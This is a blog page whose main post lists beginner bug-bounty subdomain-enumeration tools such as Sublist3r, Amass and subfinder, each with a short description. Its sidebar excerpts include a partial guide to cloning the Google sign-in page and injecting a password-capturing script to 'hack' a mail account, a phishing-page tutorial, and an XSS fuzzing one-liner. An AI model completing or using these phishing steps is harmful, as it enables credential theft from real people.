BEGINNER BUG BOUNTY TOOLS PART-1

-

 BEGINNER BUG BOUNTY TOOLS PART-1


Subdomain Enumeration:

    Subdomain enumeration, also known as subdomain discovery or subdomain reconnaissance, is the process of finding subdomains associated with a domain. Subdomains are part of a larger domain and can represent specific services, departments, or functions within an organization. Enumerating subdomains can be important for various purposes, including security assessments, web application testing, and domain management.


Tools with Description

Sublist3r - Fast subdomains enumeration tool for penetration testers

Amass - In-depth Attack Surface Mapping and Asset Discovery

massdns - A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)

Findomain - The fastest and cross-platform subdomain enumerator, do not waste your time.

Sudomy - Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting

chaos-client - Go client to communicate with Chaos DNS API.

domained - Multi Tool Subdomain Enumeration

bugcrowd-levelup-subdomain-enumeration - This repository contains all the material from the talk "Esoteric sub-domain enumeration techniques" given at Bugcrowd LevelUp 2017 virtual conference

shuffledns - shuffleDNS is a wrapper around massdns written in go that allows you to enumerate valid subdomains using active bruteforce as well as resolve subdomains with wildcard handling and easy input-output…

censys-subdomain-finder - Perform subdomain enumeration using the certificate transparency logs from Censys.

Turbolist3r - Subdomain enumeration tool with analysis features for discovered domains

censys-enumeration - A script to extract subdomains/emails for a given domain using SSL/TLS certificate dataset on Censys

tugarecon - Fast subdomains enumeration tool for penetration testers.

as3nt - Another Subdomain ENumeration Tool

Subra - A Web-UI for subdomain enumeration (subfinder)

Substr3am - Passive reconnaissance/enumeration of interesting targets by watching for SSL certificates being issued

domain - enumall.py Setup script for Regon-ng

altdns - Generates permutations, alterations and mutations of subdomains and then resolves them

brutesubs - An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose

dns-parallel-prober - his is a parallelised domain name prober to find as many subdomains of a given domain as fast as possible.
dnscan - dnscan is a python wordlist-based DNS subdomain scanner.

knock - Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist.
hakrevdns - Small, fast tool for performing reverse DNS lookups en masse.

dnsx - Dnsx is a fast and multi-purpose DNS toolkit allow to run multiple DNS queries of your choice with a list of user-supplied resolvers.

subfinder - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites.

assetfinder - Find domains and subdomains related to a given domain

crtndstry - Yet another subdomain finder

VHostScan - A virtual host scanner that performs reverse lookups

scilla - Information Gathering tool - DNS / Subdomains / Ports / Directories enumeration

sub3suite - A research-grade suite of tools for subdomain enumeration, intelligence gathering and attack surface mapping.

cero - Scrape domain names from SSL certificates of arbitrary hosts
    
    In next blog, I ll add some bug bounty tools under recon category .you can make use of it and embark in your bug bounty carrier these tools are used for enumeration of subdomains that are associated with websites

Comments

Post a Comment

Popular posts from this blog

PlayItSafe google cyber security professional course 2 (COURSERA)

-
Image
 PlayItSafe google cyber security professional course 2 (COURSERA) 1)More about the CISSP security domains-practice quiz      2)Navigate threats, risks, and vulnerabilities- quiz 3)weeklychallenge-1                       4)Test your knowledge: More about frameworks and controls-quiz 5)Test your knowledge: The CIA triad-quiz Test your knowledge: NIST frameworks Test your knowledge: OWASP principles and security audits Weekly challenge 2 Practice Quiz: Test your knowledge: Security information and event management (SIEM) dashboards Test your knowledge: Identify threats and vulnerabilities with SIEM tools Weekly challenge 3 Test your knowledge: Incident response Test your knowledge: Use a playbook to respond to an incident Weekly challenge 4 Hey guys this blog contains all answers of coursera 's google cyber security professional certification quiz answers. 
Read more

FOUNDATIONS OF CYBERSECURITY GOOGLE(COURSERA) QUIZ ANSWERS

-
Image
 FOUNDATIONS OF CYBERSECURITY GOOGLE(COURSERA) QUIZ ANSWERS    Hi guys, i've completed a courses on foundations of cyber security in coursera. here am gonna drop my answer which i've noted while  studying  this  course. ill drop the link of the notion  LINK: notion answer for foundation of cybersecurity in coursera     the above is the sequence order of the answer 
Read more

HOW TO BYPASS THE 2FA(TWO FACTOR AUTHENTICATION)

-
Image
HOW TO BYPASS THE 2FA(TWO FACTOR AUTHENTICATION) of gmail  Initially we should know about some basics of phishing attack, It is the base techinque we use here to gain password of victim        REQUIREMENTS 1)KALI LINUX 2)SUBLIME TEXT EDITOR 3)NGROK STEP 1: Initially use your browser and search for google sign in STEP 2: Type the mail id you wanna hack, after entering the mail id and click next STEP 3: After entering the mail id and right click the mouse and click inspect  STEP 4: after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes. STEP 5: paste it on sublime text editor and add some script at the end of the html tag ill drop the code here <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script> <script>     $('button').click(function(e){       e.preventDefault()       auth=$('input[type=password]').val()       $.post(
Read more

AUTOMATED SCRIPT FOR FINDING XSS

-
Image
 AUTOMATED SCRIPT FOR FINDING XSS               An example of a web security vulnerability is cross-site scripting (XSS), which enables attackers to insert malicious executable scripts into the code of a website or application that is trusted. An XSS attack is frequently started by an attacker tempting a user to click on a malicious link that they deliver to them. Through cross-site scripting (XSS) assaults, attackers can get around access restrictions like the same-origin policy, which separates websites from one another.Zero When the victim accesses the website or application that runs the malicious code, the attack really takes place.1. Malicious scripts are injected into websites that are otherwise trustworthy and benign in an exploit known as cross-site scripting (XSS). HERE IS THE SCRIPT THAT AUTOMATES XSS DETECTION  cat urls.txt| egrep -iv ".(jpg|jpeg|js|cs|gif|tiff|png|woff|woff2|ico|pdf|svg|txt)" |qsreplace ' "><()'|tee combinedfuzz.json &&
Read more

how hackers do a phishing page in 8 lines of code using html

-
Image
 How Hackers do a phishing page in  8 lines of code  phishing,what is phishing?         Phishing is a cybercrime where scammers deceive individuals or organizations by creating fake emails, websites, or messages that appear legitimate to trick victims into providing sensitive information, such as login credentials, financial data, or personal details. These fraudulent attempts aim to steal valuable information or gain unauthorized access to accounts and can lead to identity theft, financial loss, or other malicious activities. To protect against phishing, it's crucial to be cautious of suspicious emails, links, and requests for personal information, and to verify the authenticity of websites and messages before sharing sensitive data. Always use strong passwords and enable multi-factor authentication whenever possible to enhance security. PRACTICAL STEPS: Here , I am gonna clone the amazon website with only 8 lines HERE IS THE CODE <html> <head> phishing  </head>
Read more

Disclaimer

-
Disclaimer for securityblog If you require any more information or have any questions about our site's disclaimer, please feel free to contact us by email at canonminibeast@gmail.com. Our Disclaimer was generated with the help of the Free Disclaimer Generator. Disclaimers for read it gain it All the information on this website - https://readitgainit.blogspot.com/ - is published in good faith and for general information purpose only. read it gain it does not make any warranties about the completeness, reliability and accuracy of this information. Any action you take upon the information you find on this website (read it gain it ), is strictly at your own risk. read it gain it will not be liable for any losses and/or damages in connection with the use of our website. From our website, you can visit other websites by following hyperlinks to such external sites. While we strive to provide only quality links to useful and ethical websites, we have no control over the conte
Read more

Privacy policy

-
Privacy Policy for securityblog At read it gain it , accessible from https://readitgainit.blogspot.com/, one of our main priorities is the privacy of our visitors. This Privacy Policy document contains types of information that is collected and recorded by read it gain it and how we use it. If you have additional questions or require more information about our Privacy Policy, do not hesitate to contact us. This Privacy Policy applies only to our online activities and is valid for visitors to our website with regards to the information that they shared and/or collect in read it gain it . This policy is not applicable to any information collected offline or via channels other than this website. Consent By using our website, you hereby consent to our Privacy Policy and agree to its terms. Information we collect The personal information that you are asked to provide, and the reasons why you are asked to provide it, will be made clear to you at the point we ask you to prov
Read more

BITFLIPING

-
Image
BIT-FLIPING            Digital data, such as text, images, or videos, is stored and processed in computers as binary code, a sequence of 0s and 1s. Each 0 or 1 is called a bit, the smallest unit of data. A bit-flip occurs when a bit's state unintentionally changes from its initial value to the opposite. This can happen due to hardware errors, electromagnetic interference, or other factors. Bit-flips can lead to data corruption, software crashes, or system failures. To mitigate such issues, error-correcting codes and redundancy techniques are employed to detect and correct errors. Ensuring data integrity and reliability is crucial in digital systems to prevent data loss and maintain accurate information. In the realm of computing, bitsquatting and bit flipping are two intriguing phenomena that revolve around the fundamental building blocks of digital data - bits, which represent zeros and ones. Bitsquatting involves a scenario where a bit within a domain name, such as "windows.
Read more

Things should do after sublister(sublist3r)

-
Image
Things should do after sublister(sublist3r)  Sublist3r is tool which is used by pentester  which shows unique subdomains as I showed below  you won't get https:// in the begging of these url ,here I have a solution for it i.e ive developed a one line script for this Step 1: copy all the subdomains, After that use the command nano and store all the links and name it You see,there no https:// infront of the subdomains Step 2: USE THE BELOW COMMAND  sudo python -c "with open('input.txt', 'r') as infile, open('output.txt', 'w') as outfile: outfile.write('\n'.join(['https://' + line.strip() for line in infile]))" boom!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Read more